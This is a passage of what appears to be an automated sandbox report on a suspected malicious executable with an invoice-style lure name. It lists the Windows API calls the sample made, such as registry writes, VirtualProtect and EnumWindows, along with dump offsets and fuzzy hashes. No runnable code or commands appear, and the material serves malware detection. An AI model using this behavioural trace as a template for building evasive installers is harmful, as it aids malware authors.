                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CreateDirectoryErrorLast
                              • String ID:
                              • API String ID: 1375471231-0
                              • Opcode ID: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                              • Instruction ID: e893664a09cf2e9e2c2936498d7e4fae4244a4ac8c06b28443c2d62416ddc455
                              • Opcode Fuzzy Hash: f012ed4f2e447eb03a7c1a9074efbf4aa4d4dcf66ab1e3e2b7403bfb804529af
                              • Instruction Fuzzy Hash: 1AC08C302109029BDA001B309E08B173A95AB90381F118839604AE40B0CE32C405CD2E
                              APIs
                              • EnumWindows.USER32(00000000), ref: 6E132AB7
                              Memory Dump Source
                              • Source File: 00000003.00000002.178277557495.000000006E131000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E130000, based on PE: true
                              • Associated: 00000003.00000002.178277524359.000000006E130000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277587874.000000006E133000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277620276.000000006E135000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6e130000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: EnumWindows
                              • String ID:
                              • API String ID: 1129996299-0
                              • Opcode ID: 79da0242711586b1d9fd9a9f4cdb322343ac6c4c942d793a16f36cb42fb06704
                              • Instruction ID: 6656bd262fdbd66a653e14a539018b621641ab86d9601864ed8f839f96bf13df
                              • Opcode Fuzzy Hash: 79da0242711586b1d9fd9a9f4cdb322343ac6c4c942d793a16f36cb42fb06704
                              • Instruction Fuzzy Hash: 1A413B76A04624DBDB20EFE4D880BDD7BA9EB56328F308C25E50597214D73998C2FBD0
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: wsprintf
                              • String ID:
                              • API String ID: 2111968516-0
                              • Opcode ID: f613bce74ee81a27b7f87de0acc03876fa924b4f50aff6f1e0ff4ca987a4ce67
                              • Instruction ID: bedd62cc0a07b3ea5aeeb9774d64ff1fcd63ced0a2701ac0ce4006b4a1ded65c
                              • Opcode Fuzzy Hash: f613bce74ee81a27b7f87de0acc03876fa924b4f50aff6f1e0ff4ca987a4ce67
                              • Instruction Fuzzy Hash: 33212970C04299BADF219BA89548BAEBF709F11304F0448BFE490B62D1C2BD8A81CF19
                              APIs
                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004026A6
                                • Part of subcall function 00405EFE: wsprintfA.USER32 ref: 00405F0B
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: FilePointerwsprintf
                              • String ID:
                              • API String ID: 327478801-0
                              • Opcode ID: 6a14e0956b73ab4e90e394afd1f90f97da6441e28a52e0c2c4c4c0872888fc18
                              • Instruction ID: 442fb056f5e1893a743013a04d3c8a06be4ebfd32780c8d9df4a77f545abccc0
                              • Opcode Fuzzy Hash: 6a14e0956b73ab4e90e394afd1f90f97da6441e28a52e0c2c4c4c0872888fc18
                              • Instruction Fuzzy Hash: 1BE0EDB2B05116ABDB01BBD5AA49CBFA768DF50318F10403BF141F10D1CA7D49029B6D
                              APIs
                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402335
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: PrivateProfileStringWrite
                              • String ID:
                              • API String ID: 390214022-0
                              • Opcode ID: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                              • Instruction ID: fc3d639ee2ba9d49225374e904560d05d066977e3d8f4235cfc91afb5433c7ac
                              • Opcode Fuzzy Hash: 9fcb8b4b564c740448a4b0e2fc3fd6f1d230d5e928dfd18d81c924f1707ae997
                              • Instruction Fuzzy Hash: 2FE012317005146BD72076B10FCE96F10989BC4308B284D3AF502761C6DDBD4D4245B9
                              APIs
                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402B7C,00000000,?,?), ref: 00405E7D
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Create
                              • String ID:
                              • API String ID: 2289755597-0
                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                              • Instruction ID: 7acc68ffa7400c9eee32ba1e20ae5f36fa8f71d611e671e2c7f17c05e0102792
                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                              • Instruction Fuzzy Hash: F0E0E67201050DBFEF095F50DD0AD7B371DEB44744F00492EFA45D4090E6B5A9619A74
                              APIs
                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403177,00000000,00415428,000000FF,00415428,000000FF,000000FF,00000004,00000000), ref: 00405BF4
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                              • Instruction ID: a276b01dc183147df0450da273931698a90403b1c9d2199bac4a8b1ac439e1da
                              • Opcode Fuzzy Hash: d47d29d2c4ad98e9097244963089aa7711ad8f9da7a01510603535aa68a2578c
                              • Instruction Fuzzy Hash: B9E0EC3221476AABEF509E559C04AEB7B6CFB05360F008436FD55E2150D631E9219BA8
                              APIs
                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031C1,00000000,00000000,00402FEB,000000FF,00000004,00000000,00000000,00000000), ref: 00405BC5
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: FileRead
                              • String ID:
                              • API String ID: 2738559852-0
                              • Opcode ID: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                              • Instruction ID: b16ae19e339659dac821aa5fa8ec0f56b65f92cb21281493c05533f45e405579
                              • Opcode Fuzzy Hash: c828ac78080eafadef002e80ceae40fa9d69551b6ff84e56452d6cc727993955
                              • Instruction Fuzzy Hash: 14E0EC3221065ABBDF109F559C00AEB7B6CFB05361F118836F915E3150E631F8219BB4
                              APIs
                              • VirtualProtect.KERNELBASE(6E13404C,00000004,00000040,6E13403C), ref: 6E1328FF
                              Memory Dump Source
                              • Source File: 00000003.00000002.178277557495.000000006E131000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E130000, based on PE: true
                              • Associated: 00000003.00000002.178277524359.000000006E130000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277587874.000000006E133000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000003.00000002.178277620276.000000006E135000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6e130000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: c3af1a826d19b7ca4038b8ed02ccf04543b7b38efe4b2d71060d5232c760b77b
                              • Instruction ID: f0f5f9233023f40356584c4e36527d05e64ee8e677ba66b1958142a192533d42
                              • Opcode Fuzzy Hash: c3af1a826d19b7ca4038b8ed02ccf04543b7b38efe4b2d71060d5232c760b77b
                              • Instruction Fuzzy Hash: EEF0A5B1708A90DECB70CFA8848478E3FE0A31A355B11C56AE158E7341E3364886BF11
                              APIs
                              • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402373
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: PrivateProfileString
                              • String ID:
                              • API String ID: 1096422788-0
                              • Opcode ID: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
                              • Instruction ID: 8e029bd2b2674609338b614665d9252e3eb93026fbeeab8b0acd3e0b98e79a96
                              • Opcode Fuzzy Hash: de46147d6d5d82b5e111b4c29e7f346d5c0562a281aa24714321742148aa4174
                              • Instruction Fuzzy Hash: 2EE0803090430479DB10AFA18E0AEAD35649F41714F144839F5507B0D1EEB544419B3D
                              APIs
                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405EB4,?,?,?,?,00000002,Call), ref: 00405E4A
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Open
                              • String ID:
                              • API String ID: 71445658-0
                              • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                              • Instruction ID: 00f586757f971d8fddb6ba1a4fa1948c276a5597575d42b2c7248084dade2010
                              • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                              • Instruction Fuzzy Hash: 36D0EC3200020DBADF115F90ED05FAB371EEB04710F004426BA55A5090D6759520AA58
                              APIs
                              • SendMessageA.USER32(000103BE,00000000,00000000,00000000), ref: 0040409D
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                              • Instruction ID: b9763db4476a092513200920bafbf00b2c19ecde7e8b58ff16c676c9221c7c43
                              • Opcode Fuzzy Hash: 72d0fdd0e21cb56c477cf419d385c95605940825065c69d2cee1e8d6d2b2924a
                              • Instruction Fuzzy Hash: 32C04C717406006AEA208B51DD49F0677946750B01F1484397751F50D4C674E410DA1C
                              APIs
                              • SendMessageA.USER32(00000028,?,00000001,00403EA4), ref: 00404082
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                              • Instruction ID: 0adc9c0e194aa77c868d6ef978719a9753de7db756a7c543b14a3307e76eee0a
                              • Opcode Fuzzy Hash: 2bf10b83fa6dd9bc40a18547b02fbce2a65827e50004d0a7ab2884d4d9fdcea2
                              • Instruction Fuzzy Hash: B2B09235280A00AAEA215B00DE09F467A62A764701F408038B240250B1CAB200A6DB18
                              APIs
                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F2A,?), ref: 004031D2
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction ID: 1f5c7ae16c2334422adcad36111bde95194575cbdac9b1f52e29a9f6e91cc98e
                              • Opcode Fuzzy Hash: 9851be0de28bb9513f6e500a0df6ea838ed72b99fd7baa621d8f85bec57c8f40
                              • Instruction Fuzzy Hash: 34B01271240300BFDA214F00DF09F057B21ABA0700F10C034B388380F086711035EB0D
                              APIs
                              • KiUserCallbackDispatcher.NTDLL(?,00403E3D), ref: 0040406B
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: CallbackDispatcherUser
                              • String ID:
                              • API String ID: 2492992576-0
                              • Opcode ID: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                              • Instruction ID: d750239a91494785f156a03a2b8d5ac9aaa4eec5ddabb582aaccf4f48b9497e5
                              • Opcode Fuzzy Hash: a5e593389213340eb0093cabe197c3c64578a6f34cb7028dbabfa569c0510a2c
                              • Instruction Fuzzy Hash: C9A012710000009BCB015B00EF04C057F61AB507007018434A2404003186310432FF1D
                              APIs
                              • Sleep.KERNELBASE(00000000), ref: 004014E9
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000043E000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178257041859.0000000000441000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_400000_INQUIRY#46789-MAY_24_PRODUCTS.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
                              • Instruction ID: 4f2bdf6dfe5cf4b60dd5b7335af101e6a5cbd4d7fd56710333224b44724b1ee5
                              • Opcode Fuzzy Hash: 7b9632354074489533dafd45b6bc4c0d3204f827ba2cfbbd71c55f5045c93cde
                              • Instruction Fuzzy Hash: BFD05B73B101419BD714E7F8B98485F73B4DB503153204837D441E2091D578C5424A28
                              APIs
                              • CharNextA.USER32(?,00403319,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",00000020,"C:\Users\user\Desktop\INQUIRY#46789-MAY_24_PRODUCTS.exe",00000000,?,00000006,00000008,0000000A), ref: 00405970
                              Memory Dump Source
                              • Source File: 00000003.00000002.178256746072.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000003.00000002.178256704845.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256776262.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000003.00000002.178256809392.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
